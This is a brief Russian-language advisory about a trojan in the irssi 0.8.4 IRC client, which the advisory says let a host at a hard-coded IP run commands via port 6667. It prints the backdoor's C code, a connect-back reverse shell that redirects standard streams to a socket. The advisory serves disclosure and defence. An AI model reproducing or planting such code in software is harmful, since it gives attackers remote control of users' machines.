rssi - свободно доступный irc клиент для Linux и Unix систем.
Код программы содержит троян, который позволяет пользователю с IP адресом 204.120.36.206 удаленно выполнять команды на хосте, на котором установлен irssi (через 6667 порт). Зараженная версия была доступна для загрузки с начала апреля до конца мая.
Уязвимость обнаружена в irssi 0.8.4
Уязвимый код:
int s;
struct sockaddr_in sa;
switch(fork()) { case 0: break; default: exit(0); }
if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
exit(1);
}
/* HP/UX 9 (%@#!) writes to sscanf strings */
memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(6667);
sa.sin_addr.s_addr = inet_addr("204.120.36.206");
if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {
exit(1);
}
dup2(s, 0); dup2(s, 1); dup2(s, 2);